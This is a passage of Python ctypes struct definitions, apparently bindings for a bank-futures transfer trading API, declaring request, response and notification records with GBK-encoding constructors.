        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class ReqQueryTradeResultBySerial(Struct):
    """Request structure for querying a transfer result by its serial reference.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints/doubles. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("Reference", c_int),
        ("RefrenceIssureType", c_char),
        ("RefrenceIssure", c_char_Array_36),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("Digest", c_char_Array_36),
        ("LongCustomerName", c_char_Array_161),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, Reference=None, RefrenceIssureType=None, RefrenceIssure=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, CurrencyID=None, TradeAmount=None, Digest=None, LongCustomerName=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class RspQueryTradeResultBySerial(Struct):
    """Response structure for a transfer-result-by-serial query; carries the
    error info and the original return code/description.

    Fixed-width char-array fields hold GBK-encoded bytes; numeric fields are
    plain C ints/doubles. Layout mirrors the underlying C API struct.
    """
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("Reference", c_int),
        ("RefrenceIssureType", c_char),
        ("RefrenceIssure", c_char_Array_36),
        ("OriginReturnCode", c_char_Array_7),
        ("OriginDescrInfoForReturnCode", c_char_Array_129),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("Digest", c_char_Array_36),
    ]
    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, ErrorID=None, ErrorMsg=None, Reference=None, RefrenceIssureType=None, RefrenceIssure=None, OriginReturnCode=None, OriginDescrInfoForReturnCode=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, CurrencyID=None, TradeAmount=None, Digest=None):
        """Assign each truthy argument to the same-named field.

        str values are GBK-encoded for the char-array fields; numbers (and
        pre-encoded bytes) are assigned as-is. Falsy values (None, 0, "")
        are skipped, leaving the ctypes zero default — this matches the
        per-field `if X:` pattern the generated code used.
        """
        args = locals()  # snapshot taken before any other local exists: just self + params
        super().__init__()
        for _name, _val in args.items():
            if _name == "self" or not _val:
                continue  # unset/falsy arguments keep the zero-initialized default
            setattr(self, _name, _val.encode("GBK") if isinstance(_val, str) else _val)
class ReqDayEndFileReady(Struct):
    """Day-end file-ready request struct (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("FileBusinessCode", c_char),
        ("Digest", c_char_Array_36),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, FileBusinessCode=None, Digest=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("FileBusinessCode", FileBusinessCode),
            ("Digest", Digest),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (("PlateSerial", PlateSerial), ("SessionID", SessionID)):
            if arg:
                setattr(self, field, arg)
class ReturnResult(Struct):
    """Return-code / description pair (auto-generated binding)."""
    _fields_ = [
        ("ReturnCode", c_char_Array_7),
        ("DescrInfoForReturnCode", c_char_Array_129),
    ]

    def __init__(self, ReturnCode=None, DescrInfoForReturnCode=None):
        """GBK-encode both string arguments; falsy values are skipped."""
        super().__init__()
        for field, arg in (
            ("ReturnCode", ReturnCode),
            ("DescrInfoForReturnCode", DescrInfoForReturnCode),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
class VerifyFuturePassword(Struct):
    """Futures-account password verification request (auto-generated)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("InstallID", c_int),
        ("TID", c_int),
        ("CurrencyID", c_char_Array_4),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, AccountID=None, Password=None, BankAccount=None, BankPassWord=None, InstallID=None, TID=None, CurrencyID=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("AccountID", AccountID),
            ("Password", Password),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("CurrencyID", CurrencyID),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
        ):
            if arg:
                setattr(self, field, arg)
class VerifyCustInfo(Struct):
    """Customer identity verification record (auto-generated binding)."""
    _fields_ = [
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("LongCustomerName", c_char_Array_161),
    ]

    def __init__(self, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, LongCustomerName=None):
        """GBK-encode every provided string argument; skip falsy values."""
        super().__init__()
        for field, arg in (
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustType", CustType),
            ("LongCustomerName", LongCustomerName),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
class VerifyFuturePasswordAndCustInfo(Struct):
    """Combined password + customer-identity verification (auto-generated)."""
    _fields_ = [
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("CurrencyID", c_char_Array_4),
        ("LongCustomerName", c_char_Array_161),
    ]

    def __init__(self, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, AccountID=None, Password=None, CurrencyID=None, LongCustomerName=None):
        """GBK-encode every provided string argument; skip falsy values."""
        super().__init__()
        for field, arg in (
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustType", CustType),
            ("AccountID", AccountID),
            ("Password", Password),
            ("CurrencyID", CurrencyID),
            ("LongCustomerName", LongCustomerName),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
class DepositResultInform(Struct):
    """Deposit result notification (auto-generated binding)."""
    _fields_ = [
        ("DepositSeqNo", c_char_Array_15),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("Deposit", c_double),
        ("RequestID", c_int),
        ("ReturnCode", c_char_Array_7),
        ("DescrInfoForReturnCode", c_char_Array_129),
    ]

    def __init__(self, DepositSeqNo=None, BrokerID=None, InvestorID=None, Deposit=None, RequestID=None, ReturnCode=None, DescrInfoForReturnCode=None):
        """GBK-encode string args; store Deposit/RequestID as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("DepositSeqNo", DepositSeqNo),
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("ReturnCode", ReturnCode),
            ("DescrInfoForReturnCode", DescrInfoForReturnCode),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (("Deposit", Deposit), ("RequestID", RequestID)):
            if arg:
                setattr(self, field, arg)
class ReqSyncKey(Struct):
    """Key synchronization request (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Message", c_char_Array_129),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("UserID", UserID),
            ("Message", Message),
            ("DeviceID", DeviceID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("OperNo", OperNo),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
        ):
            if arg:
                setattr(self, field, arg)
class RspSyncKey(Struct):
    """Key synchronization response, with error fields (auto-generated)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Message", c_char_Array_129),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("UserID", UserID),
            ("Message", Message),
            ("DeviceID", DeviceID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("OperNo", OperNo),
            ("ErrorMsg", ErrorMsg),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class NotifyQueryAccount(Struct):
    """Account query notification (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("CustomerName", c_char_Array_51),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CustType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankPassWord", c_char_Array_41),
        ("AccountID", c_char_Array_13),
        ("Password", c_char_Array_41),
        ("FutureSerial", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("VerifyCertNoFlag", c_char),
        ("CurrencyID", c_char_Array_4),
        ("Digest", c_char_Array_36),
        ("BankAccType", c_char),
        ("DeviceID", c_char_Array_3),
        ("BankSecuAccType", c_char),
        ("BrokerIDByBank", c_char_Array_33),
        ("BankSecuAcc", c_char_Array_41),
        ("BankPwdFlag", c_char),
        ("SecuPwdFlag", c_char),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("BankUseAmount", c_double),
        ("BankFetchAmount", c_double),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("LongCustomerName", c_char_Array_161),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, BankUseAmount=None, BankFetchAmount=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
        """GBK-encode string args into char fields; store numbers as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("CustType", CustType),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("AccountID", AccountID),
            ("Password", Password),
            ("UserID", UserID),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("Digest", Digest),
            ("BankAccType", BankAccType),
            ("DeviceID", DeviceID),
            ("BankSecuAccType", BankSecuAccType),
            ("BrokerIDByBank", BrokerIDByBank),
            ("BankSecuAcc", BankSecuAcc),
            ("BankPwdFlag", BankPwdFlag),
            ("SecuPwdFlag", SecuPwdFlag),
            ("OperNo", OperNo),
            ("ErrorMsg", ErrorMsg),
            ("LongCustomerName", LongCustomerName),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("FutureSerial", FutureSerial),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
            ("BankUseAmount", BankUseAmount),
            ("BankFetchAmount", BankFetchAmount),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class TransferSerial(Struct):
    """Bank-futures transfer serial record (auto-generated binding)."""
    _fields_ = [
        ("PlateSerial", c_int),
        ("TradeDate", c_char_Array_9),
        ("TradingDay", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("TradeCode", c_char_Array_7),
        ("SessionID", c_int),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BankAccType", c_char),
        ("BankAccount", c_char_Array_41),
        ("BankSerial", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("FutureAccType", c_char),
        ("AccountID", c_char_Array_13),
        ("InvestorID", c_char_Array_13),
        ("FutureSerial", c_int),
        ("IdCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("CurrencyID", c_char_Array_4),
        ("TradeAmount", c_double),
        ("CustFee", c_double),
        ("BrokerFee", c_double),
        ("AvailabilityFlag", c_char),
        ("OperatorCode", c_char_Array_17),
        ("BankNewAccount", c_char_Array_41),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]

    def __init__(self, PlateSerial=None, TradeDate=None, TradingDay=None, TradeTime=None, TradeCode=None, SessionID=None, BankID=None, BankBranchID=None, BankAccType=None, BankAccount=None, BankSerial=None, BrokerID=None, BrokerBranchID=None, FutureAccType=None, AccountID=None, InvestorID=None, FutureSerial=None, IdCardType=None, IdentifiedCardNo=None, CurrencyID=None, TradeAmount=None, CustFee=None, BrokerFee=None, AvailabilityFlag=None, OperatorCode=None, BankNewAccount=None, ErrorID=None, ErrorMsg=None):
        """GBK-encode string args into char fields; store numbers as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeDate", TradeDate),
            ("TradingDay", TradingDay),
            ("TradeTime", TradeTime),
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BankAccType", BankAccType),
            ("BankAccount", BankAccount),
            ("BankSerial", BankSerial),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("FutureAccType", FutureAccType),
            ("AccountID", AccountID),
            ("InvestorID", InvestorID),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("CurrencyID", CurrencyID),
            ("AvailabilityFlag", AvailabilityFlag),
            ("OperatorCode", OperatorCode),
            ("BankNewAccount", BankNewAccount),
            ("ErrorMsg", ErrorMsg),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("FutureSerial", FutureSerial),
            ("TradeAmount", TradeAmount),
            ("CustFee", CustFee),
            ("BrokerFee", BrokerFee),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class QryTransferSerial(Struct):
    """Transfer-serial query filter (auto-generated binding)."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("BankID", c_char_Array_4),
        ("CurrencyID", c_char_Array_4),
    ]

    def __init__(self, BrokerID=None, AccountID=None, BankID=None, CurrencyID=None):
        """GBK-encode every provided string argument; skip falsy values."""
        super().__init__()
        for field, arg in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("BankID", BankID),
            ("CurrencyID", CurrencyID),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
class NotifyFutureSignIn(Struct):
    """Futures sign-in notification, with PIN/MAC keys (auto-generated)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
        ("PinKey", c_char_Array_129),
        ("MacKey", c_char_Array_129),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None, PinKey=None, MacKey=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("UserID", UserID),
            ("Digest", Digest),
            ("CurrencyID", CurrencyID),
            ("DeviceID", DeviceID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("OperNo", OperNo),
            ("ErrorMsg", ErrorMsg),
            ("PinKey", PinKey),
            ("MacKey", MacKey),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class NotifyFutureSignOut(Struct):
    """Futures sign-out notification (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Digest", c_char_Array_36),
        ("CurrencyID", c_char_Array_4),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("UserID", UserID),
            ("Digest", Digest),
            ("CurrencyID", CurrencyID),
            ("DeviceID", DeviceID),
            ("BrokerIDByBank", BrokerIDByBank),
            ("OperNo", OperNo),
            ("ErrorMsg", ErrorMsg),
        ):
            if arg:
                setattr(self, field, arg.encode("GBK"))
        for field, arg in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("RequestID", RequestID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if arg:
                setattr(self, field, arg)
class NotifySyncKey(Struct):
    """Key synchronization notification (auto-generated binding)."""
    _fields_ = [
        ("TradeCode", c_char_Array_7),
        ("BankID", c_char_Array_4),
        ("BankBranchID", c_char_Array_5),
        ("BrokerID", c_char_Array_11),
        ("BrokerBranchID", c_char_Array_31),
        ("TradeDate", c_char_Array_9),
        ("TradeTime", c_char_Array_9),
        ("BankSerial", c_char_Array_13),
        ("TradingDay", c_char_Array_9),
        ("PlateSerial", c_int),
        ("LastFragment", c_char),
        ("SessionID", c_int),
        ("InstallID", c_int),
        ("UserID", c_char_Array_16),
        ("Message", c_char_Array_129),
        ("DeviceID", c_char_Array_3),
        ("BrokerIDByBank", c_char_Array_33),
        ("OperNo", c_char_Array_17),
        ("RequestID", c_int),
        ("TID", c_int),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]

    def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Message=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None):
        """GBK-encode string args into char fields; store ints as-is.

        Falsy arguments are skipped (ctypes zero-fill default remains).
        """
        super().__init__()
        for field, arg in (
            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
